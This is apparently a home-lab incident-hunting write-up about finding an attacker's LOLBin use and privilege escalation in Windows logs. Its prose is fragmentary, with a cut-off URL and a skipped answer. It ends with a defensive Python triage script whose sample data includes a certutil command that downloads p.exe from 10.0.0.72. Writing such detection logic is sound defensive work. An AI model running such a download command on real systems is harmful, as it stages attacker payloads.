To catch a hacker in my home lab
After checking the website I decided to look for certutil, bitsadmin and expand, but there are more that could have been used.

Now let's move on to question two: How did the attacker escalate privileges? Hint: Look for an event that fires when a honey file is accessed. So, going by the hint, I need to find an event that fires when a file is accessed. If you didn't know which event to look for, a quick search for "Windows event id file access" would do; this site was the first to pop up: https://www.

Answer 3: 10.0.0.72. This was answered by looking at the IP address in the certutil command line.

We are looking for executables that have "users" in the command line and not "onedrive", in other words executables running in user space, which we found with p.exe.
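The three checks the write-up performs by hand (spot LOLBins such as certutil, bitsadmin and expand; pull the remote IP out of the certutil command line; flag executables launched from user-writable paths while ignoring OneDrive) can be scripted over process-creation telemetry. The following is an added example and not code from the original post: it runs over a handful of constructed Sysmon-style Event ID 1 records (the field names `Image`, `CommandLine`, `User` are assumed, and the sample paths, user name and hostnames are made up; only 10.0.0.72 and p.exe come from the write-up).

```python
"""Triage constructed process-creation records for the indicators the
write-up relies on: living-off-the-land binaries, remote IPv4 addresses in
their command lines, and images executing from user-writable paths."""
import re
from typing import Dict, List

# LOLBins the write-up looks for; the set is deliberately short and easy to extend.
LOLBINS = {"certutil.exe", "bitsadmin.exe", "expand.exe"}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample events (not real telemetry). Fields mirror Sysmon Event ID 1.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://10.0.0.72/p.exe C:\Users\alice\p.exe",
     "User": "LAB\\alice"},
    {"EventID": "1", "Image": r"C:\Users\alice\p.exe",
     "CommandLine": r"C:\Users\alice\p.exe", "User": "LAB\\alice"},
    {"EventID": "1", "Image": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
     "User": "LAB\\alice"},
    {"EventID": "1", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt", "User": "LAB\\alice"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_lolbin(image: str) -> bool:
    """True when the executing image is one of the watched LOLBins."""
    return basename(image) in LOLBINS


def extract_ips(cmdline: str) -> List[str]:
    """All IPv4 literals embedded in a command line (e.g. a download URL)."""
    return IPV4_RE.findall(cmdline)


def runs_from_user_space(image: str) -> bool:
    """True when the image lives under \\Users\\ and is not the OneDrive client.

    The check is applied to the Image path rather than the whole command line,
    so a system binary merely opening a file under C:\\Users is not flagged."""
    p = image.lower()
    return "\\users\\" in p and "onedrive" not in p


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per suspicious process-creation event."""
    findings: List[Dict[str, object]] = []
    for ev in events:
        if ev.get("EventID") != "1":
            continue
        reasons: List[str] = []
        ips = extract_ips(ev.get("CommandLine", ""))
        if is_lolbin(ev["Image"]):
            reasons.append("lolbin")
            if ips:
                reasons.append("lolbin-with-remote-ip")
        if runs_from_user_space(ev["Image"]):
            reasons.append("user-space image")
        if reasons:
            findings.append({"image": ev["Image"], "user": ev.get("User", ""),
                             "reasons": reasons, "ips": ips})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["image"], f["reasons"], f["ips"])
```

Running it flags two of the four constructed events: the certutil launch (a LOLBin carrying the 10.0.0.72 download URL) and p.exe itself executing from the user's profile; the OneDrive client and notepad are left alone. Keying the user-space test on the image path rather than the full command line is what keeps notepad opening a file under C:\Users out of the results.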